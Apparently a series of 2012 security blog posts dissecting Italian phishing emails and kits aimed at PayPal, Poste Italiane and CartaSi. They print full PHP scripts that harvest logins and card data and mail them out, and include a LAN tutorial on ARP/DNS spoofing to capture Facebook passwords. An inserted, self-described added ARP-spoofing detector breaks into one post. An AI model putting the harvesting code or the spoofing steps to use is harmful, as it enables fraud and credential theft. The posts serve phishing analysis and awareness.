<a href="http://3.bp.blogspot.com/-FaQyrHQOVg8/T4hkr29X4QI/AAAAAAAAAJE/GFVGty5kAl0/s1600/paypal_insert_data.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="466" src="http://3.bp.blogspot.com/-FaQyrHQOVg8/T4hkr29X4QI/AAAAAAAAAJE/GFVGty5kAl0/s640/paypal_insert_data.JPG" width="640" /></a></div>
<br />
<br />
Once the form is filled in and send is clicked, the data is posted to a script called <b>trimite.php</b>, which translated from Romanian means <b>send/forward</b>. This time the data isn't stored in a txt file like before but sent directly to a Fastweb email address, and at the end the victim is redirected to the original site.<br />
<br />
<pre class="brush: php"><?php
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];
$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];
//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$mesaj_html = <<<HTML
<style>
</style>
<center>
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Indirizzo email</b></td>
<td style="font-family: tahoma; font-size: 11px;">$username</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Password PayPal</b></td>
<td style="font-family: tahoma; font-size: 11px;">$password</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Nome</b></td>
<td style="font-family: tahoma; font-size: 11px;">$nome</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Gnome</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cognome</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data di nascita:</b></td>
<td style="font-family: tahoma; font-size: 11px;">$dob_ziua:$dob_luna:$dob_an(ziua:luna:an)</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Indirizzo</b></td>
<td style="font-family: tahoma; font-size: 11px;">$address1</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>CAP</b></td>
<td style="font-family: tahoma; font-size: 11px;">$zip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Città</b></td>
<td style="font-family: tahoma; font-size: 11px;">$city</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Provincia</b></td>
<td style="font-family: tahoma; font-size: 11px;">$state</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Tipo di carta di credito</b></td>
<td style="font-family: tahoma; font-size: 11px;">$c_tip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Numero della carta di credito</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cn</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data di scadenza</b></td>
<td style="font-family: tahoma; font-size: 11px;">$luna/$an</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Codice di sicurezza della carta</b></td>
<td style="font-family: tahoma; font-size: 11px;">$cvv</td>
</tr>
</tbody></table>
<hr color="silver" />
<table><tbody>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>IP</b></td>
<td style="font-family: tahoma; font-size: 11px;">$ip</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Data</b></td>
<td style="font-family: tahoma; font-size: 11px;">$data</td>
</tr>
<tr>
<td style="font-family: tahoma; font-size: 11px;"><b>Browser</b></td>
<td style="font-family: tahoma; font-size: 11px;">$agent</td>
</tr>
</tbody></table>
</center>
HTML;
mail($email, $subiect, $mesaj_html, $headers);
header("Location: http://www.paypal.it");</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3bs9XHOfqNg/T4hiRzh183I/AAAAAAAAAI0/u72sdxiiuGw/s1600/paypal_original.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://4.bp.blogspot.com/-3bs9XHOfqNg/T4hiRzh183I/AAAAAAAAAI0/u72sdxiiuGw/s640/paypal_original.JPG" width="640" /></a></div>
<br />
He did a good job replicating the PayPal login process.<br />
<br />
In the <b>stf</b> folder all stolen data are sent to <b>fanemacaz@gmail.com</b>, and the techniques used to trick users are the same as explained previously.<br />
<br />
Folder index file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-HOht-V1JUp4/T4qMbMeVAFI/AAAAAAAAAJ0/IBc5WptSddw/s1600/too_curious.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="http://4.bp.blogspot.com/-HOht-V1JUp4/T4qMbMeVAFI/AAAAAAAAAJ0/IBc5WptSddw/s640/too_curious.JPG" width="640" /></a></div>
<br />
Folder content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WzqAE6bkhgQ/T4qMCq6NAsI/AAAAAAAAAJk/s_CGjdUbOAI/s1600/stf_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="http://1.bp.blogspot.com/-WzqAE6bkhgQ/T4qMCq6NAsI/AAAAAAAAAJk/s_CGjdUbOAI/s640/stf_content.JPG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oqY_SvoP3WM/T4qMNFEznBI/AAAAAAAAAJs/yiPlBAFX2Mo/s1600/stf_mail_spammer.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="http://3.bp.blogspot.com/-oqY_SvoP3WM/T4qMNFEznBI/AAAAAAAAAJs/yiPlBAFX2Mo/s640/stf_mail_spammer.JPG" width="640" /></a></div>
That's all for now.<br />
<br />
<b>Poste Italiane phishing emails 2</b> (2012-04-20)<br />
<br />
In these hours a "new" phishing attack is targeting Poste Italiane and its service called Postepay. In the previous article regarding <a href="http://security-obscurity.blogspot.it/2012/04/poste-italiane-phishing-e-mails.html">poste italiane phishing email</a> the phisher, to convince the victims to send their account details, said that they had won a bonus of 250 euro.<br />
<br />
This time he chose another way that is more credible (in my opinion).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WVgtChyAwO4/T5E6rriSLyI/AAAAAAAAAKU/7bAtJFwphSs/s1600/email_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="http://3.bp.blogspot.com/-WVgtChyAwO4/T5E6rriSLyI/AAAAAAAAAKU/7bAtJFwphSs/s640/email_content.JPG" width="640" /></a></div>
<br />
The title says <b>we detected irregular activity on your Poste Italiane account</b> and the content continues: <b>for your protection you must download the attachment and fill in the form. If you ignore this email your account will be temporarily suspended</b>.<br />
<br />
The sender is <b>support@update.com</b><br />
<br />
When you open the attachment you get this page with a central form ready to be filled with postepay account details (Username, Password, Credit Card Number, Expiration Date, Security Code).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-onpPgcbpWCc/T5FLAr1AaYI/AAAAAAAAAKs/Hd5cOSo2Zow/s1600/attachment.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://2.bp.blogspot.com/-onpPgcbpWCc/T5FLAr1AaYI/AAAAAAAAAKs/Hd5cOSo2Zow/s640/attachment.JPG" width="640" /></a></div>
<br />
In this file he hasn't tried to obfuscate the form code as he did last time, so the address of the server where the data will be sent is easily visible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Z5jG1LcOGmA/T5FJ-El02wI/AAAAAAAAAKc/rZYk54WhzKs/s1600/data_sent.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="http://3.bp.blogspot.com/-Z5jG1LcOGmA/T5FJ-El02wI/AAAAAAAAAKc/rZYk54WhzKs/s400/data_sent.JPG" width="400" /></a></div>
<br />
This server is located in Poland and the ISP is Netia S.A.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Is-jcavqotc/T5GJM0MG9pI/AAAAAAAAALM/8Ah4TYM2PEc/s1600/server_location.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://2.bp.blogspot.com/-Is-jcavqotc/T5GJM0MG9pI/AAAAAAAAALM/8Ah4TYM2PEc/s640/server_location.JPG" width="640" /></a></div>
<br />
There are no domains that point to this IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/--aOaXgVfQJc/T5GAJ7yPQgI/AAAAAAAAAK8/y6eTaj-Xj8I/s1600/other_domains.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="http://2.bp.blogspot.com/--aOaXgVfQJc/T5GAJ7yPQgI/AAAAAAAAAK8/y6eTaj-Xj8I/s640/other_domains.JPG" width="640" /></a></div>
<br />
The server is running a copy of Windows Server 2003 with Apache2Triad, which is a sort of WAMP, except that the project has been dead since 2009. If you browse to this address the index page looks like this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Ecutuv-4H08/T5GLUd4VXDI/AAAAAAAAALU/drpUOsIGjdQ/s1600/index.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://3.bp.blogspot.com/-Ecutuv-4H08/T5GLUd4VXDI/AAAAAAAAALU/drpUOsIGjdQ/s640/index.JPG" width="640" /></a></div>
<br />
He created an index that doesn't list the other files on the server. As you can imagine, the <b>sobo.php</b> script collects the stolen data, saves this information in a txt file or sends an email to the phisher, and at the end redirects the victim to the original site. What will its content be?<br />
<br />
Downloaded with wget, so no php: <a href="http://pastebin.com/znxS8aet">index page</a><br />
<br />
I was expecting to see a meta tag or nothing; instead I found a copy of the Poste Italiane website. Here is a screenshot posted on <a href="http://www.phishtank.com/phish_detail.php?phish_id=1416490">PhishTank</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.phishtank.com/screenshot_proxy.php?phish_id=1416490" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="554" src="http://www.phishtank.com/screenshot_proxy.php?phish_id=1416490" width="640" /></a></div>
Maybe this means that he started by redirecting the victims to this site and stealing the information there; now he sends an attachment.<br />
<br />
That's all for now.<br />
<br />
<b>ARP/DNS Spoofing Steal Facebook Password (LAN Environment)</b> (2012-04-19)<br />
<br />
In this video I'll show you how an attacker can steal user credentials for any site (in this case it will be Facebook) in a LAN environment. First of all we use <a href="http://www.secmaniac.com/">SET</a> to clone the current Facebook home page and set up a server listening on port 80 with that copy.<br />
<br />
The next step is to discover potential victims by mapping our network. There are tons of ways to do this (nmap, hping, the ping command), but this time I used the Linux command <b><a href="http://linux.die.net/man/1/arp-scan">arp-scan</a></b> with the following syntax:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LzE3c4dxi24/T48BsX-T5wI/AAAAAAAAAJ8/ggRqhuU5Ymw/s1600/arpscan.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="http://1.bp.blogspot.com/-LzE3c4dxi24/T48BsX-T5wI/AAAAAAAAAJ8/ggRqhuU5Ymw/s640/arpscan.JPG" width="640" /></a></div>
<br />
After mapping the network I used a great tool called <b>netcmd</b> to perform an <a href="http://en.wikipedia.org/wiki/ARP_spoofing">arp spoofing</a> attack to redirect traffic through the attacker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RGGXBNIvugg/T48Cnv0Tu1I/AAAAAAAAAKE/WH1Tg9M7zv0/s1600/netcmd.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://3.bp.blogspot.com/-RGGXBNIvugg/T48Cnv0Tu1I/AAAAAAAAAKE/WH1Tg9M7zv0/s640/netcmd.JPG" width="640" /></a></div>
<br />
The last step is to perform a <a href="http://en.wikipedia.org/wiki/DNS_spoofing">dns spoofing</a> attack so that all requests sent by the victim to facebook.com are redirected to the attacker. To do this we need to use ettercap and modify <b>/usr/share/ettercap/etter.dns</b>, adding these two lines.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-kyMK5i0FbHc/T48DC64pSAI/AAAAAAAAAKM/T1DUFzOEl-s/s1600/etter.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://2.bp.blogspot.com/-kyMK5i0FbHc/T48DC64pSAI/AAAAAAAAAKM/T1DUFzOEl-s/s400/etter.JPG" width="400" /></a></div>
<br />
After launching ettercap we just have to wait for the victim to log in to his Facebook account.<br />
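What the arp spoofing step above looks like from the defender's side: an added detection example (my code, not from the post or from any of the tools it uses) that reads tcpdump-style ARP reply lines and flags an IP whose MAC suddenly changes and a single MAC answering for several IPs (gateway and victim). The capture, the addresses and the MACs are constructed.

```python
import re
from collections import defaultdict

# Matches tcpdump-style ARP reply lines: "<ts> ARP, Reply <ip> is-at <mac>, ...".
ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+ARP,\s+Reply\s+(?P<ip>[\d.]+)\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed sample capture (not from the post): the gateway 192.168.1.1 is
# legitimately at ...:01, then a second host (...:99) starts answering for
# both the gateway and the victim 192.168.1.20.
SAMPLE_CAPTURE = """\
10:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:01.050 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28
10:00:02.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
10:00:05.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28
10:00:06.000 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:99, length 28
10:00:07.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99, length 28
"""


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for every ARP reply line; other lines are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY_RE.match(line.strip())
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def detect_arp_spoofing(text, gateway_ip=None):
    """Return a list of alert dicts built from the ARP replies in `text`.

    Two signatures are checked:
      - "ip_mac_change": an IP already bound to one MAC is claimed by another MAC
        (every poisoned reply raises one alert).
      - "mac_claims_many_ips": one MAC claims a second IP, which is what a
        man-in-the-middle does when it impersonates both gateway and victim.
    """
    first_seen = {}                  # ip -> mac first observed for it
    ips_per_mac = defaultdict(set)   # mac -> set of ips it has claimed
    alerts = []
    for ts, ip, mac in parse_arp_replies(text):
        known = first_seen.setdefault(ip, mac)
        if known != mac:
            alerts.append({
                "time": ts, "type": "ip_mac_change", "ip": ip,
                "expected_mac": known, "seen_mac": mac,
                "gateway": ip == gateway_ip,
            })
        claimed = ips_per_mac[mac]
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:
                alerts.append({
                    "time": ts, "type": "mac_claims_many_ips", "mac": mac,
                    "ips": sorted(claimed), "gateway": gateway_ip in claimed,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE, gateway_ip="192.168.1.1"):
        print(alert)
```

On a real segment the same logic can be fed from `tcpdump -l -n arp` output; a static ARP entry for the gateway on the client is the usual mitigation.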
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/A4hH5PHMk6s" width="640"></iframe><br />
<br />
Enjoy the video.<br />
<br />
<b>CartaSi phishing email part 1/2</b> (2012-04-15)<br />
<br />
CartaSi is a credit/charge card and can be used in Italy and abroad.<br />
<br />
On the 31st of March I received an email from <b>CartaSi_Informa@cartasi.it</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0JuCcLmc2Kw/T4NbwIbVBqI/AAAAAAAAAGs/jxby9zia0J4/s1600/cartasi_email_content3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-0JuCcLmc2Kw/T4NbwIbVBqI/AAAAAAAAAGs/jxby9zia0J4/s640/cartasi_email_content3.JPG" width="640" /></a></div>
<br />
It is a classic phishing email and it says to download the attachment in order to unlock your account. One strange thing is the two Cyrillic words at the end; maybe this text has been translated from Russian/Ukrainian by someone, because there are no mistakes, and they forgot the two letters.<br />
<br />
Why didn't they check it more carefully before sending?<br />
<br />
The missing Italian letters are <b>è</b> and <b>ù</b>, which carry an accent, so maybe this is a failed encoding by Hotmail or by the software they used to send the email.<br />
<br />
By the way, the phishers have used a credible domain name (cartasi.it), which is the original one. The attachment to download is named "CartaSi Secure Department" and if you open it with a browser it looks like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-lpEXAslXn8E/T4NkVAZPhaI/AAAAAAAAAG8/dPZLToZIePE/s1600/attachment.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="410" src="http://2.bp.blogspot.com/-lpEXAslXn8E/T4NkVAZPhaI/AAAAAAAAAG8/dPZLToZIePE/s640/attachment.JPG" width="640" /></a></div>
<br />
Here is the original.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Q1A4MumrI2Q/T4WigHEhYFI/AAAAAAAAAHk/5pX4kQJrKSM/s1600/original_cartasi_page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://4.bp.blogspot.com/-Q1A4MumrI2Q/T4WigHEhYFI/AAAAAAAAAHk/5pX4kQJrKSM/s640/original_cartasi_page.JPG" width="640" /></a></div>
<br />
Opening the attachment with a text editor we can see where the stolen data will be sent, but this time too the initial FORM tag is encoded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-uvEF0zMiyPk/T4WkCO3z8pI/AAAAAAAAAHs/nO5LfvpGkvo/s1600/encoded_sourcecode.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="http://3.bp.blogspot.com/-uvEF0zMiyPk/T4WkCO3z8pI/AAAAAAAAAHs/nO5LfvpGkvo/s640/encoded_sourcecode.JPG" width="640" /></a></div>
<br />
Once decoded we get this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-iZLUe5smjXA/T4WkxMKSLoI/AAAAAAAAAH0/sYyz_FnbKA4/s1600/decode_sourcecode.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="http://2.bp.blogspot.com/-iZLUe5smjXA/T4WkxMKSLoI/AAAAAAAAAH0/sYyz_FnbKA4/s640/decode_sourcecode.JPG" width="640" /></a></div>
<br />
Let's analyze the domain with a whois service.<br />
<br />
Domain details:<br />
<ul>
<li>Registered: 7 September 2011</li>
<li>Expires: 7 September 2012</li>
<li>Registrar of record: TUCOWS, INC.</li>
<li>Record last update: 23 March 2012 </li>
</ul>
<div>
Other details are omitted.</div>
<div>
<br /></div>
<div>
Right now the homepage is a blank page, but I found a cached page taken on the 15th of March by Google's crawlers.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-DYyA_3rwxdM/T4NpSz1xH1I/AAAAAAAAAHE/gRrXKKmkWIQ/s1600/cached_website.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://1.bp.blogspot.com/-DYyA_3rwxdM/T4NpSz1xH1I/AAAAAAAAAHE/gRrXKKmkWIQ/s640/cached_website.JPG" width="640" /></a></div>
<div>
<br /></div>
<div>
This was a legitimate website running the WordPress CMS, and through one of its (or its plugins') flaws the phishers were able to upload a shell. The <b>shel</b> folder has no index file and no .htaccess to prevent directory listing, so here is its content.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-GDfIFaXEAtk/T4NtJ0MVT9I/AAAAAAAAAHU/c0CeLrJAEmc/s1600/shel_content.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-GDfIFaXEAtk/T4NtJ0MVT9I/AAAAAAAAAHU/c0CeLrJAEmc/s1600/shel_content.JPG" /></a></div>
<div>
As you can see there are several files, but the most important are <b>cartasi.txt</b> and <b>go1.php</b>. The php file stores the stolen information in cartasi.txt and maybe does other things. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-I4q93KOCQ5Y/T4NuRuviYLI/AAAAAAAAAHc/BhKs_CNpe-M/s1600/cartasi_txt.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-I4q93KOCQ5Y/T4NuRuviYLI/AAAAAAAAAHc/BhKs_CNpe-M/s1600/cartasi_txt.JPG" /></a></div>
<div>
<br /></div>
<div>
The pastote folder doesn't have a proper .htaccess file either, but it has an index.php file. His mistake was to name the file with an initial uppercase letter, so all files are listed.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3YHY1yV4vfg/T4WlLeQFLGI/AAAAAAAAAH8/M692rcyJXdk/s1600/pastote_dirlist.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://3.bp.blogspot.com/-3YHY1yV4vfg/T4WlLeQFLGI/AAAAAAAAAH8/M692rcyJXdk/s640/pastote_dirlist.JPG" width="520" /></a></div>
<br /></div>
<div>
The funniest thing is that pollo.php is a c99 shell and abc.php is an "<b>evilc0der v. edition ADVANCED!</b>" shell, both with no password protection, so anyone can use them to download, upload and do other things. I used a shell to download go1.php to see what this script does other than append stolen information to cartasi.txt and redirect to http://www.bancopostaclik.it/mc_securcode.shtml.</div>
<div>
<br /></div>
<div>
Here is the code.</div>
<div>
<pre class="brush: php"><?php
$message = "";
$username = $_POST['loginx'];
$password = $_POST['passwdx'];
$name = $_POST['name'];
$ccnumb = $_POST['ccnumb'];
$month = $_POST['month'];
$year = $_POST['year'];
$cvv = $_POST['cvv2'];
$condice = $_POST['condice'];
$name = $_POST['name'];
$email = $_POST['email'];
$pswmail = $_POST['pswmail'];
$dsecure = $_POST['3dsecure'];
$ip = getenv("REMOTE_ADDR");
$datamasii = date("D M d, Y g:i a");
$message .=".............................................\n";
$message .="Username : $username\n";
$message .="Password : $password\n";
$message .="Full Name: $name\n";
$message .="CCNumber : $ccnumb\n";
$message .="Exp : $month/$year\n";
$message .="Cvv2 : $cvv\n";
$message .="3D Secure: $dsecure\n";
$message .="CFiscal : $condice\n";
$message .="Mail : $email\n";
$message .="Pasw : $pswmail\n";
$message .="Date : $datamasii \n";
$message .="..............................................\n";
$message .="©IP $ip\n";
$subject = " CartaSi ";
$file = fopen("cartasi.txt", "a");
fputs ($file, "$message\r\n");
fclose ($file);
mail("--snip--@fastwebmail.it",$subject,$message);
header("Location: http://www.cartasi.it/gtwpages/common/index.jsp?id=HgSgFKmncL");
</pre>
</div>
<div>
The other thing it does is send an email to a Fastweb address. Fastweb is an Italian broadband telecommunications company that provides voice, Internet, cable television and IPTV services. Its email accounts come with a contract, and this means one of two things:</div>
<div>
<ol>
<li>The phisher has hacked a user's email account</li>
<li>It is his own email.</li>
</ol>
<div>
That's it; in the next part I will examine all the other files.</div>
</div>
<br />
<b>Poste Italiane phishing emails</b> (2012-04-06)<br />
<br />
Poste Italiane is the government-owned postal service of Italy, and spammers use phishing techniques to trick people into sending the credentials of their online accounts and credit cards.<br />
<br />
On the first of April I received an email from <b>bancoposta@bpolbpol.com</b> with this content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XLZTjPc88l8/T3sGKdQLDiI/AAAAAAAAAF8/SFRNFwrMJQQ/s1600/poste_phishing.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://4.bp.blogspot.com/-XLZTjPc88l8/T3sGKdQLDiI/AAAAAAAAAF8/SFRNFwrMJQQ/s640/poste_phishing.JPG" width="640" /></a></div>
<br />
Basically it says that I have been selected to get a bonus of 250 euro and that, in order to complete the operation, I must download the attachment.<br />
<br />
First of all we see that the sender's domain is neither poste.it nor postepay.it, which is rather strange for a legitimate email. I was curious to know what type of site was behind the domain, so I navigated to that URL and got a white screen with blue text reading "website under construction".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tnVBbmWcR78/T3sHi3n1HsI/AAAAAAAAAGE/ijkRuJuW-uQ/s1600/poste_under_costruction.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="http://2.bp.blogspot.com/-tnVBbmWcR78/T3sHi3n1HsI/AAAAAAAAAGE/ijkRuJuW-uQ/s640/poste_under_costruction.JPG" width="640" /></a></div>
<br />
Maybe we can get more information by checking through <a href="http://whois.domaintools.com/">http://whois.domaintools.com</a> who registered that domain.<br />
<br />
Few details:<br />
<ul>
<li>Record created: 2/7/2011</li>
<li>Record expires: 2/7/2012.</li>
<li>Registration service provider: Aruba S.p.A. </li>
</ul>
Other details are omitted because they contain the owner's personal information.<br />
<br />
The strange thing about this website is that it has never been linked or added to Google, so no one can find it through a search engine. Since it's not linked I cannot search for a cached page, and consequently I cannot know what type of website was running.<br />
<br />
A brief look with nslookup shows that it has its own mail server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-y_Tyl3rn-us/T3siaFRma4I/AAAAAAAAAGM/vy3nhOA0uaw/s1600/nslookup.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-y_Tyl3rn-us/T3siaFRma4I/AAAAAAAAAGM/vy3nhOA0uaw/s1600/nslookup.JPG" /></a></div>
<br />
Since we cannot know whether this site was operational, I would say that the SMTP server was used to spread spam without the owner's knowledge.<br />
<br />
Now it's time to see what the attachment is. It's a simple HTML file called <b>Document.html</b>, and if you open it with a browser you get a Postepay page with a central form listing fields such as username, password, credit card number, expiration date and security code, ready to be filled in.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-celOq8kvFVI/T31B-9qaHoI/AAAAAAAAAGc/V8eBoZ0R1D8/s1600/fake_site.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="http://4.bp.blogspot.com/-celOq8kvFVI/T31B-9qaHoI/AAAAAAAAAGc/V8eBoZ0R1D8/s640/fake_site.JPG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
As you can see it looks very similar to the original, they did a pretty good job.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-mN9DKRm4SYM/T31COa0m-4I/AAAAAAAAAGk/LeIhreqH850/s1600/original_poste_website.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="http://3.bp.blogspot.com/-mN9DKRm4SYM/T31COa0m-4I/AAAAAAAAAGk/LeIhreqH850/s640/original_poste_website.JPG" width="640" /></a></div>
<br />
One thing to notice is that the expiration date year still uses 2011; this means that the HTML page was created last year and they haven't updated it yet.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SVN4MVASl9Y/T3sBn8mLLHI/AAAAAAAAAF0/hnIEHNGF72U/s1600/fake_page_2011.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SVN4MVASl9Y/T3sBn8mLLHI/AAAAAAAAAF0/hnIEHNGF72U/s1600/fake_page_2011.JPG" /></a></div>
<br />
Where is this information sent?<br />
<br />
To find out we open our fake page with an editor like Notepad++. There are two lines at the top, one regarding the copyright and the other rather funny, because it tells you that the source code is not available.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Fnu4qRgLtHg/T3rI6deiJII/AAAAAAAAAFU/pmi0BFisQ3c/s1600/notepad_sourcecode1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://4.bp.blogspot.com/-Fnu4qRgLtHg/T3rI6deiJII/AAAAAAAAAFU/pmi0BFisQ3c/s640/notepad_sourcecode1.JPG" width="640" /></a></div>
<br />
If you scroll down to the end of the page, there are a few lines of HTML with obfuscated JavaScript.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
